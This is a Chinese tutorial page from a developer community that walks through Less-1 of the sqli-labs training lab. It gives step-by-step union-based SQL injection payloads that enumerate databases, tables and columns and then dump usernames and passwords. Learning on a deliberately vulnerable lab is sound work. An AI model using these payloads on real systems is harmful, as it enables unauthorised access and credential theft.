AI 助理
文档备案控制台
开发者社区 安全 文章 正文

sqli-lab教程Less-1

2024-01-25 156
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sqli-lab教程Less-1

less-1

sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。


学习sqli注入必备语句:

查库:select schema_name from information_schema.schemata


查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)


查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)


查字段的值:select username,password from security.users(此处拿username,password字段为例)


1.加单引号看出,此处是用单引号包裹的,使用单引号注入


2.使用- -+闭合,回显恢复


3.使用order by语句判断列数


4.发现有三列


5.使用union select联合查询,把id改成一个不存在的值使得有回显位

?id=-1' union select 1,2,3 --+



6.进行爆库操作

?id=-1' union select 1,2,database() --+



7.进行爆表操作

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+


group_concat:将所有的数据连接进行拼接后作为一行显示


where:指定库的位置


8.进行爆字段操作

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+



9.进行爆字段值操作

?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+


concat_ws(’~’,A,B)


显示为(A~B),用于区分用户名、密码


注入完成! 这是方法之一,后期会出sqlmap工具等教程…
文章标签:
安全
数据安全/隐私保护
Brucye
目录
相关文章
derek武汉
|
机器学习/深度学习 人工智能
一键生成PPT的AI工具介绍
一键生成PPT的AI工具介绍
derek武汉
2123 0
aliyun7080399747
|
Linux Docker 容器
Linux本地搭建StackEdit Markdown编辑器结合内网穿透实现远程访问
Linux本地搭建StackEdit Markdown编辑器结合内网穿透实现远程访问
aliyun7080399747
343 0
游客5fdji2pvmf8888
|
安全 Linux 编译器
探索Linux内核的奥秘:从零构建操作系统####
本文旨在通过深入浅出的方式,带领读者踏上一段从零开始构建简化版Linux操作系统的旅程。我们将避开复杂的技术细节,以通俗易懂的语言,逐步揭开Linux内核的神秘面纱,探讨其工作原理、核心组件及如何通过实践加深理解。这既是一次对操作系统原理的深刻洞察,也是一场激发创新思维与实践能力的冒险。 ####
游客5fdji2pvmf8888
431 0
xiaowang_lj
|
开发工具 Android开发
rk平台Android12屏幕永不休眠
rk平台Android12屏幕永不休眠
xiaowang_lj
626 1
67vpym2vvkfhs
|
存储 算法 数据格式
一篇文章讲明白Mipmap与纹理过滤
一篇文章讲明白Mipmap与纹理过滤
67vpym2vvkfhs
656 1
东方睿赢
|
关系型数据库 MySQL Linux
在 CentOS 7 中通过编译源码安装 MySQL 数据库的详细步骤,并与使用 RPM 包安装进行了对比。
本文介绍了在 CentOS 7 中通过编译源码安装 MySQL 数据库的详细步骤,并与使用 RPM 包安装进行了对比。内容涵盖准备工作、下载源码、编译安装、配置服务、登录设置及实践心得,帮助读者根据需求选择最适合的安装方法。
东方睿赢
614 2
kaixin321-44007
|
存储 监控 安全
深入剖析隐私安全测试
深入剖析隐私安全测试
kaixin321-44007
471 1
龙蜥社区(OpenAnolis)
|
人工智能 安全 Cloud Native
告别 CentOS,开源操作系统与时代同步更需“根”的力量
一切过往,皆为序章。
龙蜥社区(OpenAnolis)
491 7
嘟嘟嘟嘟嘟嘟
|
搜索推荐
淘宝粗排问题之引入未曝光样本和随机负样本对粗排模型有何影响,如何解决
淘宝粗排问题之引入未曝光样本和随机负样本对粗排模型有何影响,如何解决
嘟嘟嘟嘟嘟嘟
427 0
AokSend接口-API
|
API PHP 数据安全/隐私保护
IMAP邮箱API接收收取邮件的方法和步骤
IMAP邮箱API是用于自动接收和管理邮件的接口,允许程序无须手动登录即可操作邮件。要使用它,需先配置邮箱允许API访问,选择如Python的imaplib或PHP的imap扩展等IMAP库,然后连接到邮箱服务器,接收和处理邮件。处理完毕后断开连接。AokSend提供高效发信服务,支持SMTP/API接口。使用IMAP API能提升邮件管理效率。
AokSend接口-API
888 1

热门文章

最新文章

  • 1
    dns被劫持怎么修复?6种常用修复方法
  • 2
    十年磨一剑 | 淘宝如何打造承载亿级流量的首页?
  • 3
    Cmdb、Saltstack、Web化,莉莉丝游戏云上运维心得分享
  • 4
    linux搭建邮件服务器
  • 5
    SHEVDC平台及物联网技术产品选型
  • 6
    Flink线上问题汇总篇(1)-状态过期导致的sum结果负数问题
  • 7
    山东智汇谷总裁高庆民:携手阿里赋能聊城产业升级。
  • 8
    SQL Server 2008 R2 新建数据库
  • 9
    OpenJudge计算概论-文字排版
  • 10
    赢家理财之道:被理财不如i理财
  • 1
    工业粉尘检测数据集分享(适用于YOLO系列深度学习分类检测任务)
    32
  • 2
    一个引号就能攻破你的网站,HTML 编码你学不学
    33
  • 3
    《提前设断点,再也不慌!QClaw长任务防中断指南》
    34
  • 4
    《掌握QClaw输出调控逻辑,各类版式素材随心生成》
    43
  • 5
    阿里HappyHorse视频生成大模型:视频定价720P 每秒0.9元,目前在阿里云百炼免费体验快乐小马
    52
  • 6
    只需两步!阿里云一键快速部署OpenClaw/Hermes Agent
    37
  • 7
    【超详细】阿里云/本地部署 OpenClaw/Hermes Agent 图文教程(含API配置+高效Skill+避坑指南)
    75
  • 8
    【最全】阿里云/Win11/MacOS/Linux 部署 Hermes Agent/OpenClaw保姆级方案+免费大模型API配置+高级Skill实战+避坑指南
    68
  • 9
    【保姆级图文教程】阿里云/本地部署Hermes Agent/OpenClaw、免费大模型配置、Skills接入与常见问题解答
    56
  • 10
    【最全】阿里云/本地部署 Hermes Agent/OpenClaw步骤+Skill清单+免费API配置一站式教程
    44

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    阿里云重磅发布Agentic SOC,企业级AI Agent驱动的安全运营平台